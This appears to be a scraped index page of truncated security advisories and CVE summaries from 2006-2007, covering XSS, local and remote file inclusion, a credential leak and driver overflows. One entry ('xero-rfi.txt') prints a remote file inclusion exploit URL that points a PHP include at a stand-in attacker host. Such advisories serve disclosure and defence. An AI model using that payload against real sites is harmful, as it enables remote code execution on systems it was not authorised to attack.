EUVD-2007-0612

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 allows remote attackers to cause a denial of service persistent application crash via a crafted phsh hash attribute in a TXT key...

X.Org X server: Multiple vulnerabilities

Background The X Window System is a graphical windowing system based on a client/server model. Description Multiple memory corruption vulnerabilities have been found in the ProcDbeGetVisualInfo and the ProcDbeSwapBuffers of the DBE extension, and ProcRenderAddGlyphs in the Render extension. Impac...

xero-rfi.txt

C XORON - 2007 Bug name: Xero Portal v1.2 phpbbrootpath Local File Include Vulnerablity Script Name: Xero Portal v1.2 Wrong Codes: require$phpbbrootpath . 'includes/bbcode.'.$phpEx; Exploit: www.target.com/scriptpat/admin/adminlinkdb.php?phpbbrootpath=http://evilscripts?...

Cross site scripting

Cross-site scripting XSS vulnerability in index.html aka the administration page in PHP Link Directory phpLD 3.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted link, which is triggered when the administrator uses the "Validate Links" functionality...

CVE-2007-0529

CVE-2007-0529 affects PHP Link Directory (phpLD) 3.0.6 and earlier. The vulnerability is a Cross-Site Scripting (XSS) in the admin page index.html, exploitable via a crafted link and triggered when the administrator uses the "Validate Links" functionality. The CVSS 2.0 base score is 4.3 (Medium) ...

Kerio Winroute Firewall 5.10 users credentials leak

Application: Kerio Winroute Firewall 5.10 Vendor: Kerio Technologies Inc. Vendor Site: http://www.kerio.com Remote: Yes Exploitable: Yes Risk level: Critical if proxy requires authentication Authors: Alexander Antipov & 3APA3A aka Pig Killer Authors Sites: http://www.securitylab.ru...

eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion

eXtreme-fusion 4.02 - FusionForumView.php Local File Inclusion source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized...

eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion

source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local scripts. By combining thi...

CVE-2006-6369

SQL injection vulnerability in lib/entryreplyentry.php in Invision Community Blog Mod 1.2.4 allows remote attackers to execute arbitrary SQL commands via the eid parameter, when accessed through the "Preview message" functionality...

CVE-2006-6196

Cross-site scripting XSS vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field txtsearchtext parameter...

CVE-2006-6196

Cross-site scripting XSS vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field txtsearchtext parameter...

CVE-2006-6196

CVE-2006-6196 describes a cross-site scripting (XSS) vulnerability in the search functionality of the Fixit iDMS Pro Image Gallery. The issue allows remote attackers to inject arbitrary web script or HTML via the search field (txtsearchtext parameter). The NVD entry lists a CVSSv2 base score of 6...

NVIDIA binary graphics driver: Privilege escalation vulnerability

Background The NVIDIA binary graphics driver from NVIDIA Corporation provides the kernel module and the GL modules for graphic acceleration on the NVIDIA based graphic cards. Description Rapid7 reported a boundary error in the NVIDIA binary graphics driver that leads to a buffer overflow in the...

CVE-2006-5430

CVE-2006-5430 is an XSS vulnerability affecting db-central (dbc) Enterprise CMS and db-central CMS, exploitable through the search needle parameter. The core issue is a reflected/script injection in the search functionality, enabling remote attackers to inject arbitrary script/HTML. The CVSS v2 v...

CVE-2006-5168

Cross-site scripting XSS vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...

CVE-2006-5168

Cross-site scripting XSS vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...

mod_pubcookie -- Empty Authentication Security Advisory

Nathan Dors, Pubcookie Project reports: An Abuse of Functionality vulnerability in the Pubcookie authentication process was found. This vulnerability allows an attacker to appear as if he or she were authenticated using an empty userid when such a userid isn't expected. Unauthorized access to web...

Pebble 2.0.0 RC[1,2] XSS vulnerability

Software: Pebble Version: 2.0.0 RC1 - 2.0.0 RC2 Author: Simon Brown Homepage: http://pebble.sourceforge.net Abstract Pebble is a blogging system built upon java and XML. There is no database to store the data into but just XML is used instead. Description Vulnerability: XSS vulnerability in...

RE: Computer Associates eTrust Security Command Center Multiple Vulnerabilities

aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 22-Sep-2006 Software: Computer Associates - eTrust Security Command Center http://www3.ca.com/solutions/Product.aspx?ID=4351 "eTrust Security Command Center helps you discover and prioritize relevan...

EEYE:ALERT: MS06-042 Related Internet Explorer 'Crash' is Exploitable

MS06-042 Related Internet Explorer 'Crash' is Exploitable Date: August 22, 2006 Severity: High Systems Affected: Windows 2000 with IE6 SP1 and MS06-042 hotfix installed Windows XP SP1 with IE6 SP1 and MS06-042 hotfix installed Overview: On August 8th Microsoft released MS06-042 which was a...